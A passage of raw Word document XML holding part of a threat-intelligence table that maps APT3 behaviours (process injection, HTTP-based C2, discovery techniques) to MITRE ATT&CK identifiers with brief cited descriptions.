                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F834DC" w:rsidRPr="000966C3" w14:paraId="367465A0" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B936F03" w14:textId="3B91F39C" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1216B01E" w14:textId="70BFDCBC" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B6F2347" w14:textId="73DDDF1D" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F834DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1055.009</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F834DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Process Injection: Proc Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41A90CFF" w14:textId="2A0CB9F6" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D6460F1" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EE7A9E8" w14:textId="2B7FB1DB" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786E177F" w14:textId="219801F4" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00C510A3" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="603D6EE0" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00C510A3" w:rsidRPr="00C510A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The exploit uses common vector corruption techniques to bypass Address Space Layout Randomization (ASLR), and uses Return-Oriented Programming (ROP) to bypass Data Execution Prevention (DEP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="212985AF" w14:textId="77777777" w:rsidR="003E4C02" w:rsidRDefault="003E4C02" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00C510A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A neat trick to their ROP technique makes it simpler to exploit and will evade some ROP detection techniques</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (no specific Technique observed)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32886AC2" w14:textId="5D56C5C6" w:rsidR="003B0DFF" w:rsidRPr="000966C3" w:rsidRDefault="003B0DFF" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Leads to execution of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>pirpi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/Shotput</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F834DC" w:rsidRPr="000966C3" w14:paraId="4AEA873E" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A006061" w14:textId="3E5665B3" w:rsidR="00F834DC" w:rsidRDefault="00D50BA8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B7E3BE2" w14:textId="79EA79CD" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="009B0CB1" w:rsidP="00F834DC">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64CC345A" w14:textId="4221C9E2" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00D50BA8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0901463A" w14:textId="334F9A7F" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="009B0CB1" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10EFD745" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="00F834DC" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C222E62" w14:textId="0FE6B8B5" w:rsidR="00F834DC" w:rsidRDefault="009B0CB1" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="265A47E9" w14:textId="1CF9A397" w:rsidR="00F834DC" w:rsidRPr="000966C3" w:rsidRDefault="009B0CB1" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13017B40" w14:textId="77777777" w:rsidR="00F834DC" w:rsidRDefault="00D50BA8" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] C</w:t>
            </w:r>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ommunicate with their C2 by issuing HTTP GET requests to the C2 domain hardcoded inside the payload or within its “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>vcl.tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>” configuration file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7085751B" w14:textId="113A4BEB" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00FF6034" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF6034">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The GET request will return a web page that the malware will parse, specifically looking for encoded commands within two of the HTML tags.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF6034" w:rsidRPr="000966C3" w14:paraId="01E9CE2A" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5790D19C" w14:textId="5D9E46F9" w:rsidR="00FF6034" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C626C2" w14:textId="63B244AB" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71C9DF8D" w14:textId="344699D2" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1057 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="689226D2" w14:textId="49013AD9" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49E83735" w14:textId="77777777" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="00FF6034" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C9ABBD3" w14:textId="4F3B71CB" w:rsidR="00FF6034" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07248A1D" w14:textId="7EE68249" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FD322C6" w14:textId="75A57EA4" w:rsidR="00FF6034" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Backdoor commands 2, 12 and 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E7F11" w:rsidRPr="000966C3" w14:paraId="6316B843" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63D2A36B" w14:textId="4E7F57D1" w:rsidR="001E7F11" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22D42480" w14:textId="29ACB45A" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F891A2B" w14:textId="5CD761F8" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1018 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E7F11">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Remote System Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09BDAB08" w14:textId="313C3EBD" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C57095A" w14:textId="77777777" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="420EAB6B" w14:textId="6F3F9FEA" w:rsidR="001E7F11" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D30D06" w14:textId="28B29A55" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A78144" w14:textId="7F924E80" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Backdoor commands 2, 12 and 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E7F11" w:rsidRPr="000966C3" w14:paraId="063B1CA9" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433E239F" w14:textId="70E4E338" w:rsidR="001E7F11" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41E965F3" w14:textId="55A32C27" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31F8F74A" w14:textId="33E9381E" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="009904A2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009904A2" w:rsidRPr="009904A2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
